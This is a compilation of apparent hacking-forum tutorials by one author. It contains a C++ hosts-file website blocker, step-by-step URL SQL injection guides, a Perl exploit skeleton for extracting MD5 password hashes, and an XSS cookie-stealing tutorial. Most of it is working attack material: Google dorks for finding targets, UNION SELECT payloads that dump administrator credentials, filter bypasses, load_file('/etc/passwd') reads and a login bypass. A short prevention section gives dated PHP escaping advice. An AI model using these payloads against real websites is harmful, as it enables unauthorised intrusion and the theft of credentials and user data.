How to block a website from your pc

hello friends

i am here to post how to block any website in your pc to block from ilegal acess
it is quite easy to use.
Follow the steps ...


Step1-open any cpp compiler

Step2- paste the following code into compiler

       #include <fstream>

 #include <iostream>

 using namespace std;

 int main()

 {

 char site[20],ch;

 ifstream in;

 ofstream out;

 cout<<"Enter the Name of the Site to Block \n";

 cin>>site;

 out.open("C:/Windows/System32/​drivers/etc/hosts",ios::app);

 if(!out)

 cout<<"Either File Not Found or Permission Denied, Run as Admin the EXE of the Program";

 else

 {

 out<<"127.0.0.1"<<"\t"<<site;

 cout<<site;

 cout<<"is blocked";

 }

 out.close();

 return 0;

 }

step 3: save it as .cpp

step4-compile it and run it

step 5-rum the .exe file as administrator
done......
any problem comment here...


bikash

URL based SQL injection tutorial

Introduction:

SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution.

Finding Sites: 

When talking to find a vulnerable site for SQL Injection you will hear the term Dork a lot, this refers to a google search term targeted at finding vulnerable websites. An example of a google dork is inurl:index.php?id=, entering this string in google search engine would return all sites from google cache with the string news.php?id= in their URL.
Ex:

http://www.site.com/news.php?id=4

To be a SQL injection vulnerable a site has to have a GET parameter in the URL.
In http://www.site.com/news.php?id=4, id=4 is the GET parameter as it is getting the id=4 from the backend database.

Checking Vulnerability: To check if the site is vulnerable to SQLi the most common way is to just add an apostrophe( ‘ ) after one of the parameter in the URL.
Ex:

http://www.site.com/news.php?id=4′

Now if the site is vulnerable it will show error like:

You have an error in your SQL Syntax

Warning: mysql_num_rows()
Warning: mysql_fetch_assoc()
Warning: mysql_result()
Warning: mysql_fetch_array()
Warning: mysql_numrows()
Warning: mysql_preg_match()

If you see any of these errors when entering ‘ after the number or string of parameter then the chances are the site is vulnerable to SQLi attacks to some extent. Although that is not the only way to know if the site is vulnerable to SQLi attacks, an error can be in form of when a part of the site is just simply disappears such as a news article, body text or images. If this happens then the site is vulnerable also.

Finding number of columns: After you find that the site is vulnerable the next step is to find the number of columns in the table that is in use. There are couple of ways to do this like ORDER BY or GROUP BY. Here I will use ORDER BY To find the number of columns start with ORDER BY 1.

Ex.

http://www.site.com/news.php?id=4 ORDER BY 1–

If it doesn’t error then probably you can use ORDER BY command. Sometimes you will get error on doing ORDER BY 1, if it gives error then simple move on to other site. If it doesn’t error then I always go to ORDER BY 10000 (because a table can’t have 10000 columns in it) to see if it give error.

Ex.
http://www.site.com/news.php?id=4 ORDER BY 10000–

Sometimes it doesn’t error as it should, then I use AND 1=0 before the ORDER BY query to get an error.

Ex.

http://www.site.com/news.php?id=4 AND 1=0 ORDER BY 10000–

After getting the error on 10000 its up to you how you find the number of columns, I start with 100 and divide the no of columns by 2 until i get closer. Something like this:

http://www.site.com/news.php?id=4 ORDER BY 100–
ERROR

http://www.site.com/news.php?id=4 ORDER BY 50–
ERROR

http://www.site.com/news.php?id=4 ORDER BY 25–
ERROR

http://www.site.com/news.php?id=4 ORDER BY 12–
ERROR

http://www.site.com/news.php?id=4 ORDER BY 6–
ERROR

http://www.site.com/news.php?id=4 ORDER BY 3–
NO ERROR

As 6 is giving error and 3 is not the number of columns is either 3, 4 or 5.

http://www.site.com/news.php?id=4 ORDER BY 4–
NO ERROR

http://www.site.com/news.php?id=4 ORDER BY 5–
ERROR

After this you can conclude that the website has 4 columns as it gives error above ORDER BY 4 and doesn’t error below ORDER BY 4.

NOTE: Comments are not necessary every time when injecting a website, although sometimes they are. Possible comments to use are:
–
/*
/**/
#

Getting MySQL version: This is an important step because if the MySQL version is lower than 5 then we have to guess the name of the tables and columns to inject which is sometimes get frustrating so I would recommend to work on version 5 for beginners. Before finding the version of the column we have to find the visible column number to inject our query to get result. To do this we will use the SELECT statement and UNION ALL statement.

http://www.site.com/news.php?id=4 UNION ALL SELECT 1,2,3,4–

It will return numbers back in data place, if it doesn’t then add a negative sign after the equals sign, put a null in place of the number after the equal sign or add AND 1=0 before the UNION query.

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,3,4–

http://www.site.com/news.php?id=null UNION ALL SELECT 1,2,3,4–

http://www.site.com/news.php?id=4 AND 1=0 UNION ALL SELECT 1,2,3,4–

Now say we got back the number 3, so this is the column that we can retrieve data from. To get the database version there are two ways either version() or @@version, let’s use them:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(version()),4–

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(@@version),4–

If you get an error like “Illegal mix of coallations when using @@version“, then you have to convert it into latin from UTF8 as:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(@@version using latin1),4–

NOTE: We are completely replacing the number 3 with our query, something like 1,2,group_concat(@@version),3,4– will result in error.

If it worked you will get the version of MySQL. You will see something like 5.0.45, 5.0.13-log, 4.0.0.1 etc. All we need to focus is on the first number,i.e., 4 or 5. If it is 5 then keep going but if it is 4 and you are new then you should move on to other website because we have to guess the table names in order to extract the data.

NOTE: Sometime you will get frustrated by knowing that you spent 5-10 minutes in just getting the database version after applying the ORDER BY, UNION SELECT and version() in queries and the result is MySQL4. So to save my time in getting the database version, I use the Inferential(Blind SQL Injection) to get the version of the MySQL. Do as follows:

http://www.site.com/news.php?id=4 AND 1=1–
NO ERROR

http://www.site.com/news.php?id=4 AND 1=2–
ERROR

http://www.site.com/news.php?id=4 AND substring(@@version,1,1)=4–
If page come back true then the version is 4.

http://www.site.com/news.php?id=4 AND substring(@@version,1,1)=5–
If page come back true then the version is 5.

If version is 5 then you can start ORDER BY and continue because you already know that the version is 5 and you will not have to guess the table names. Although I would recommend that beginners should use ORDER BY.

GETTING NAME OF DATABASES: Getting databases name is very important because sometimes the current database the webpage is running does not contains useful informations such as username and passwords. So it is good to have a look at all the databases. In MySQL version 5 or higher there is always a database named ‘information_schema’ which make SQL injection easier. To get the list of the databases use this:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(schema_name),4 from information_schema.schemata–

now you will get the name of all the databases at the same position where you saw the version of MySQL before.
Ex: information_schema,db_site,db_main

To know which database you are working upon use database() in the query as:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(database()),4–

Now you will get the current database. Ex: db_site

To know the current user of database use user(), although its not necessary but its good to know.

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(user()),4–

Now you should get the current user of database. Ex: user@localhost.

To save your time you can use a query to display version, current database and user all at once as:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(version(),0x3a,database(),0x3a,user()),4–

or

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,CONCAT_WS(CHAR(32,58,32),version(),database(),user()),4–

Getting Table Names: It is good habit to check the table name of all the databases because sometimes the current database does not contains useful information.

To get the table names of current database:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(table_name),4 from information_scheme.tables where table_schema=database()–

Assume it gave you the following names of the tables contains in the current database(in our example db_site).
Ex. News, Gallery, Games etc.
As you can see it is not looks useful, so get the table names of other database(in our example db_main), but to do so you have to encode the name of the database in hexadecimal form and put ’0x’ in front of the encoded hexed name to tell the database that it is hex encoded and and it need to be decoded it to get the right name. In our example we need to get the table name of database ‘db_main’ after encoding it to hex it is equivalent to ’64625f6d61696e’. To get the table names of the database ‘db_main’:
http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x64625f6d61696e–

It will give you the name of all tables in the database ‘db_main’.
Ex: newsletters, posts, Administrator

Now we can see that this is a good stuff.

NOTE: Online Text to Hex converter: http://www.swingnote.com/tools/texttohex.php

Getting Column Names: Now to extract data from table Administrator we need to find the columns in it. To get this you would do:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x41646d696e6973747261746f72–

NOTE: We replace ‘information_schema.tables‘ with ‘information_schema.columns‘ and ‘table_schema‘ with ‘table_name‘. Again we encoded ‘Administrator’ in Hex to get our query work.

Now you should see the column names.
Ex: Id,Username,Password

Now to extract data from columns ‘Id,Username,Password‘ of table ‘Administrator‘ of database ‘db_main‘, you would do:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(CONCAT_WS(CHAR(32,58,32),Id,Username,Password)) from db_main.Administrator–

Sometimes it will not work then you have to encode ‘db_main.Administrator‘ into hex:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(CONCAT_WS(CHAR(32,58,32),Id,Username,Password)) from 0x64625f6d61696e2e41646d696e6973747261746f72–

Now you will get what you were looking for.

If you find that I have written something that is wrong, please address it and I will fix it. 

SQL injection using perl

[1] Introduction
[2] Little panning of Perl language used into an internet context
[3] Perl SQL Injection by examples
[4] Gr33tz to all new and former visitors and …

—+— StArT
[1] Introduction
Perl can be considered a very powerfull programming language in we think to the internet context. Infact we can make a lot
of operation across the internet just writing a litlle bit of code. So i decided to write a similar guide to make an
easiest life to everyone who decide to start writing a perl exploit.
There are few requisites u need to proceed:
- U must know the basics operation of perl (print, chomp, while, die, if, etc etc…);
- U must know what kind of SQL code u need to inject to obtain a specific thing (stealing pwd, add new admin, etc etc…).
Now, we are ready to start…
[2] Little panning of Perl language used into an internet context
Using a Perl code into an internet context means that u should be able to make a sort of dialog between your script and the
server side (or other..). To make this u need to use some “Perl modules”.
Those modules must be put on the head of the script. In this tut we are going to use only the “IO::Socket” module, but
there are thousand and if u are curious just search on cpan to retrieve info on every module.
[-] Using the IO::Socket module
Using this module is quite simple. To make the Perl Interpreter able to use this module u must write on the starting
of the script “use IO::Socket”. With this module u’ll be able to connect to every server defined previously, using
a chomp, look at the example.
Example:
print “Insert the host to connect: “;
chomp ($host=);
Now suppose that the host inserted is www.host.com. We must declare to the interpreter that we want to connect to this
host. To do this, we must create a new sock that will be used by the interpreter to connect.
To create this we are going to write something like this:
$sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″)
or die ” ]+[ Connecting ... Can't connect to host.nn";
In this piece of code we have declared that the interpreter must use the "IO::Socket" module, creating a new
connection, through the TCP protocol, using the port 80 and direct to the host specified in the chomp
($host=www.fbi.gov).
If connection is not possible an error message will appear ("Connecting ... Can't connect to host").
Resume:
- Proto=>TCP -------> The protocol to use (TCP/UDP)
- PeerAddr=> -------> The server/host to connect
- PeerPort=> -------> Port to use for the connection
Ok, now let's go to the next step, which is the real hearth of this tut.
[3] Perl SQL Injection
Assuming that we know what kind of SQL statement must inject, now we are going to see how to do this.
The SQL code must be treaty like a normal variable (like “$injection”).
Example:
$injection=index.php/forum?=[SQL_CODE]
This string means that we are going to inject the query into “index.php/forum” path, following the correct syntax that
will bring us to cause a SQL Injection “?=”.
Now we must create a piece of code that will go to inject this query into the host vuln.
print $sock “GET $injection HTTP/1.1n”;
print $sock “Accept: */*n”;
print $sock “User-Agent: Hackern”;
print $sock “Host: $hostn”;
print $sock “Connection: closenn”;
This piece of code is the most important one into the building of an exploit.
It can be considered the “validation” of the connection.
In this case the “print” command doesn’t show anything on screen, but it creates a dialogue and sends commands to the host.
In the first line the script will send a “GET” to the selected page defined into “$injection”.
In the third line it tells to the host “who/what” is making the request of “GET”. In this case this is Hacker, but it
can be “Mozilla/5.0 Firefox/1.0.4″ or other.
In the fourth line it defines the host to connect to, “$host”.
With the execution of this script we have made our injection.
Resume of the exploit:
use IO::Socket
print “Insert the host to connect: “;
chomp ($host=);
$sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″)
or die ” ]+[ Connecting ... Can't connect to host.nn";
$injection=index.php/forum?=[SQL_CODE]
print $sock “GET $injection HTTP/1.1n”;
print $sock “Accept: */*n”;
print $sock “User-Agent: Hackern”;
print $sock “Host: $hostn”;
print $sock “Connection: closenn”;
close ($sock); #this line terminates the connection
A little trick:
Assuming that, with the execution of SQL Inj, u want to retrieve a MD5 Hash PWD, u must be able to recognize it.
Additionally, u want that your script will show the PWD on your screen.
Well, to make this, the next piece of code, could be one of the possible solutions.
while($answer = <$sock>) {
if ($answer =~ /([0-9a-f]{32})/) {
print “]+[ Found! The hash is: $1n”;
exit(); }
This string means that if the answer of the host will show a “word” made by 32 characters (”0″ to “9″ and “a” to “f”),
this word must be considered the MD5 Hash PWD and it must be showed on screen.
Conclusions:
The method showed in this tut is only one of the 10000 existing, but, for me, this is the most complete one.
U could use also the module “LWP::Simple” in the place of “IO::Socket”, but u should change something into the code.
This method can be used also, not only for SQL Injection, but, for example, remote file upload or other.
FEEL FREE TO COMMENT 

REGARDS 

BIKASH

##########################################

----------------------------------------------------------------------------

....................................................... 

prevention of sql injection in php

To avoid the sql injection attack, please follow the following simple mechanisms in PHP 1) Always restrict the length of the fields of form such as don’t allow more than 20 characters in the fields like username and password with the “maxlength” property available in the html form. 2) Always validate for the proper input like weather the value is valid email or not, is numeric or not , valid date or not etc. 3) Finally, Always use mysql_real_escape_string() function before sending the variable to the SQL query, it ad. For example note you must be connected to the database for using this function

Code:$username=mysql_real_escape_string($_POST['username']); $password=mysql_real_escape_string($_POST['password']);

if a intruder inject ‘ OR 1 in the user name and password field then the value of the $username and $password will become \’ OR 1 which is not going to harm us anymore.



this might also help some one
.htaccess


Code:# Block out any script trying to set a mosConfig value through the URL RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR] # Block out any script trying to base64_encode crap to send via URL RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR] # Block out any script that includes a

The complete guide to SQL Injections

Hello eghacking readers......
This article is about a technique which is used for hacking the websites and the technique is very popular among hackers. The technique is known as SQL Injections.


So, lets start reading ............


What is SQL Injection
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.



0x00 - Intro
All the information contained in the article is from personal experience, if I don't go over something that you currently do or have seen in SQL injections, its because I do not use it; not saying I'm right just that's how it is. As you should already know, extracting database information from a server without administration approval is illegal and I cannot be held accountable for any malicious actions executed after reading this article.


0x01 - What is MySQL
"SQL" stands for "Structured Query Language," which simply allows users to send queries to the server database. There are different types of SQL such as MySQL, which is Microsoft's version of the language and also has some different commands as well as syntax.


0x02 - Finding SQL Injections
Before jumping into this topic I want to explain to you about comments in MySQL. There are three variations to a comment in this language:

--


/*


#


As you should already know a comment just blocks out a section so it will not be executed through the query. Typically, anytime you see a page from a website that takes in a parameter such as:

?id=


?category_id=


?user_id=


(not saying injections are narrowed down to only id parameters but they are quite common) you may want to test the page for a vulnerability. The simplest way I know of to check for a vulnerability is to add:

" and 1=1--


to the end of the URL and see if the contents of the page change, even the slightest bit, if they don't then add

" and 1=0--


(it doesn't have to be 1=1 or 1=0 just something that returns true for the first statement and false for the second) and see if it changes after the second. If the contents change after the second query then you have a vulnerability.


0x03 - Gathering Information
To make your job or life a little easier you should look around the site some to gather information on what you are trying to retrieve. For instance, if the site has a user registration look at the source code for the page and take note of the field names they use (most developers are lazy and use the same names for simplicity); you can also look around the site for more vulnerabilities. Alright so once you have found some good information to look forward to, its time to find out how many columns are being selected from the database from the original query. This is an important step because if number of columns you "select" and the number from the original are not identical, the injection does not work! To find out the number of column you simply add "order by x" on the end of your vulnerable URL replacing "x" with a increasing number until you get an error

http://www.site.com/vulnerable.php?id=4 order by 9--

the number of columns being selected is the value of x before the error.


0x04 - The Injection
I suppose this is where some people get confused. In MySQL in order to combine two query statements you can use the keyword "union", you can also include the keyword "all" which will display all results (default property of union is to remove duplicate results from display). After your "union all" you also need to include the keyword "select" since we are going to want to select database information and display it on the screen so far you should be looking at something similar to:

http://www.site.com/vulnerable.php?id=4 union all select


Continuing the injection like the previous example will work fine, but it will also display all the original results as well as our new results, typically to bypass this I, as well as most of the other people exploiting SQL injections, replace the id value, in the case of our example it would be 4, with one of the following:

-1


null


or any result that would not be in the database, this way the original select query will not result anything but our new injected select query will display. In SQL each column being selected must be separated by a comma(,) so if your vulnerable site is selecting 4 columns with the original statement (which was found earlier when we were gathering information using the "order by") you would just concatenate those on your injection; I like to set each column to a different numeric value that way i can keep track of which columns are actually being displayed on the screen. So far, if everything has been going good, you should have an injection URL looking something like:

http://www.site.com/vulnerable.php?id=-1 union all select 1,2,3,4--


If not then go back and keep reading it until you figure it out. The last part of our injection setup is the telling the query which table to "select" the information from; we do this with the keyword "from table"...pretty self explanatory right? So for example, we have a vulnerable site that has 4 columns being selected and we want to look at the "users" table we can have a set up such as:

http://www.site.com/vulnerable.php?id=-1 union all select 1,2,3,4 from users--


Easy enough so far, now is where it gets a little more difficult, but not too much.


0x05 - Tables and Columns
Depending on the version of MySQL the administrators are running on the server, finding table and column names can be very easy or somewhat irritating. There is an easy way to figure out what version is running on the server, can you guess? If you did not guess version(), why the hell not, its like one of the easiest and self explanatory things ever! Anyways, replace one of the columns in your injection that displays on the screen with the function call version() and this will tell you which typically its either 4.x.x or 5.x.x. If they are running some form of version 4 then you're basically on your own when it comes to figuring out table and column names (I'll post some examples of common names later); though if version 5 is implemented then your life is easy. As of version 5.1 of MySQL the developers began to automatically include a master database on the server called INFORMATION_SCHEMA. Within information_schema there are tables that give information about all the tables, columns, users, etc on the entire SOL server (to find more about the structure of information_schema and the table/column names visit http://dev.mysql.com/doc/refman/5.0/en/information-schema.html). Once you figure out a table name and some column names within that table you want to look at just place them into our injection setup from before; suppose we have a site that has a "users" table and columns "user" and "pass" and the second and third columns are displayed onto the screen, we could view these by an injection such as:

http://www.site.com/vulnerable.php?id=-1 union all select 1,user, pass, 4 from users--


This example will display both the user and pass onto the screen in the given positions, though what happens if only one column is selected or displayed? In MySQL there is function called concat() which simply concatenates fields together so to simplify our previous example we could have:

http://www.site.com/vulnerable.php?id=-1 union all select 1, concat(user,0x3a, pass), 3, 4 from users--



"0x3A" is just a colon(:) in hexadecimal, simply to separate the two fields for my own viewing.


0x06 - Narrowing down the Selection
Typically when performing a SQL injection there are multiple results you want to look at or possibly just one individual. There are a couple of ways to narrow down your selection first way is to use the "where" keyword is just takes a logical parameter such as "where id=1" which would look in the id column in the table and find which row is equal to 1. The next way to to use the "limit" keyword; this way is a little more useful since you do not need to know an additional column name to increment through the selections limit takes two parameters, where to start the selection and how many to select. So in order to select only the very first "user" from the table "users" using the "limit" keyword you could have:

http://www.site.com/vulnerable.php?id=-1 union all select user from users limit 0,1--


to look at the rest of the users individually you just increment the 0 up until you get an error. In order to look at all the results in a single swipe you can use the function group_concat() which works very similarly to concat() except it displays all the results for the given column(s) separated by a comma(,) (the comma is just the default, you can change it by using the "separator" keyword and indicate a symbol to use).


0x07 - Obstacles
Excluding the fact that version 4 in general is an obstacle, there are a few different things web developers can do to try and make sql injections a little more difficult. The most common of these annoyances would be magic_quotes; basically magic quotes disallows any type of quotation marks and breaks it by adding a back-slash(\), which of course is going to mess up your injection. To get around this there is the nice little function char(); char() takes ascii values and generates the corresponding character value, thus eliminating the need for a quote. Example time...say we want to look at the "pass" column FROM the table "users" but only WHERE the "user" column is only equal to "admin" and the site only selects one column from the original query, easy enough right? we learned this earlier

http://www.site.com/vulnerable.php?id=-1 union all select pass from users where user="admin"--


curve ball! the developers have enabled magic_quotes therefore your "admin" will not work properly...i know its sad. To fix it we simply take the ascii values of each character (http://crashoverron.t35.com/ascii.php) so now we get

http://www.site.com/vulnerable.php?id=-1 union all select pass from users where user=char(97,100,109,105,110)--


TA-DA! injection fixed. Also another safety feature they try to block us with is regular expressions to search our input, but often times they have their expressions set to such narrow possibilities that you can bypass them by simply changing the case, the comment symbol, or replacing spaces with "+" (SQL is not case sensitive, it also sees "+" as a space filler much like a space).


0x08 - Additional opportunities
Although I said before version 4 was a pain in the ass, I have also noticed a nice feature common to version 4 vulnerable sites I have come across in my adventures; this feature would be the function load_file(), not saying the function is exclusive to version 4 but from my experience it is most commonly enabled for current users by developers for some reason in this version. load_file() acts just as file_get_contents() from PHP in that it returns the contents of the file into a string format. If enabled this allows for more than just SQL styles hacks on the server, it now allows for LFI vulnerabilities as well. Although, load_file() needs to have the exact full path to the file you are trying to open, for example: /home/CrashOverron/Desktop/file, and if input as a literal string then it must be encased in quotes, which brings back the issue of magic_quotes but as before just use the char() function. The next interesting feature that is hardly ever possible, but I have seen happen, is the use of the "INTO OUTFILE" keywords. This is the exact opposite of load_file(), in order to use either of these features the current user that MySQL is running as must have the FILE privilege on the server. Again, the full path is needed for the output file, which cannot be an existing file, though unlike load_file() the char() function does not fix magic_quotes. Time for an example of both, here is the situation: vulnerable site has 1 column selected also has a "users" table. load_file no magic_quotes:

http://www.site.com/vulnerable.php?id=-1 union all select load_file('/etc/passwd')--


load_file with magic_quotes:

http://www.site.com/vulnerable.php?id=-1 union all select load_file(char(47,101,116,99,47,112,97,115,115,119,100))--


INTO OUTFILE:

http://www.site.com/vulnerable.php?id=-1 union all select "test" INTO OUTFILE "/etc/test" from users--



0x09 - Blind SQL Injection
Blind SQL injection occurs when the original select query obtains column information but does not display it onto the screen. In order to continue through a blind SQL injection you must basically brute-force any value you want to know. There are a few functions we can use in conjunction with each other that make this quite easy yet tedious, those would be the mid() and the ASCII() functions. mid() is MySQL's sub string function and ascii() does the exact opposite of char() it takes a character and exchanges it with the corresponding ASCII numeric value. Doing this allows us to determine the range each of our desired value is in on the ASCII chart, thus narrowing each down until we find a match. Example situation; we have found a site that is vulnerable to blind sql injection and we want to figure out which user MySQL is currently running as, our injection sequence could look something like:

http://www.site.com/vulnerable.php?id=1 and ascii(mid(user(),1,1)) < 97--


(this will tell us if the first letter in the user is above/below "a" then we can change the 97 to a different value until we find the character to the first letter)

http://www.site.com/vulnerable.php?id=1 and ascii(mid(user(),2,1)) < 97--


(just repeat as before and keep incrementing through the letters and you will eventually have the current user)


0x10 - Login Bypass
Ok, I left this for towards the end because it is not really very common anymore but I will through it in because I suppose you may run across it some day (I have only ran across this vulnerability once in real world). The concept behind the SQL login bypass is quite simple; in order to execute the exploit you input a username into the user field then in the password field of the form you put:

' or 1=1--


this just ends the current password field and includes the logical OR with a constant true statement. A simple MySQL login script could look like:
<?php $user = $_POST['user']; $pass = $_POST['pass']; $ref = $_SERVER['HTTP_REFERER']; if((!$user) or (!$pass)) { header("Location:$ref"); exit(); } $conn = @mysql_connect("localhost", "root", "blah") or die("Could not connect"); $rs = @mysql_select_db("db", $conn) or die("db error"); $sql = "SELECT * FROM users WHERE user=\"$user\" AND pass=\"$pass\""; $rs = mysql_query($sql, $conn) or die("query error"); $num = mysql_numrows($rs); if($num != 0) { echo("Welcome $user"); } else { header("Location:$ref"); exit(); } ?>

so if we input the user "admin" and "" or 1=1--" as the password the query sent to the server is going to look like this:

"SELECT * FROM users WHERE user="admin" AND pass="" or 1=1--"


so the server is going to select row where the "user" equals "admin" and disregard if the "pass" is correct because it is asking if the pass OR 1=1 are true, since 1=1 is always true you bypass the pass section.


0x11 - Useful Keywords/Functions
UNION ALL SELECT AND/OR ORDER BY WHERE LIMIT LIKE INTO OUTFILE char() ascii() mid() concat() group_concat() load_file() user() database() version()


That's all about the SQL.... Hope u like it ...
Leave a comment or suggestion...

Complete tutorial in xss cross site scripting for beginners

What is xss???
XSS stands for Cross site Scripting. It is one of the top Web Application Vulnerability. This vulnerability allows the attacker to insert client side scripts(especially Javascript).Using this vulnerability an attacker can inject malicious codes, which leads to malware attacks..

XSS Vulnerability and Injection:

Step 1: Finding Vulnerable Website: 

     its not a difficult job for a script kiddieAs usual an attacker will search in google using the google Dork. For example, he will search for "search?q=". This will results plenty of website.

Step 2: Testing the Vulnerability:

In order to test the vulnerability, we need to find a POST or Get parameter. Confused ? It is just input fields that will be send to server. For example search query,username ,password . 
There are two ways to test the vulnerability:

Method 1: Injection in form box(especially search box)
An attacker can enter the malcious script inside the search box and click the search button. This will lead to run the malicious script inside that website 

Method 2: Injecting in url
In this method , there may not any form box. They use the url field instead.For Example:

http://vulnerablewebsite/search?q=malicious_script_goes_here

Using method 1, you can enter the code in search box and click the search button.
or
using method 2, you can enter the code in url like this:

http://vulnerablewebsite/search?q=

if it shows "You are hacked by bikash " message in popup box, then it is vulnerable to XSS.

Step 3: Injecting Malicious Scripts
After find vulnerable site, an attacker will inject malicious scripts. It may lead to stealing cookies and malware attack as said before.

Let us assume an attacker has cookie stealing script in his website. for instance, his malicious script url is

http://TargetSite/malicious.js

He can inject now the malcious script inside the vulnerable site like this:

http://TargetSite/malicious.js>

When visitors loads into website, the malicious start to run and cause to cookie stealing.

Types of XSS Based on persisting capability:

There are two types of XSS based on persisting Capability namely Persistent and Non-Persistent.

Persistent XSS:
This is risky XSS vulnerability , it stores the data provided in server. So the malicious script injection is permanently stored in web application. It will be shown to other users when they visit the site.
if the attacker inject malware , then regular users of that website also infected .

For example:
Some sites may store the search query in order to track the user interest. This results in permanent storage of XSS.

Non-Persistent XSS:
Also referred as Reflected XSS . In this case, the storage of malicious script is temporary one(means it won't be shown to other users). Attacker may trick users to visit the URL with injection. As they are regular user of that site, they will trust the link. It leads to stealing cookies.

For example:
When you search in some site, it will return the result with your searching string. This cause to run the malicious code temporarily.

What can an attacker do with this Vulnerability?

• Stealing the Identity and Confidential Data(credit card details).
• Bypassing restriction in websites.
• Malware Attack
• Denial of Service attacks(Dos)

any doubts please comment and share....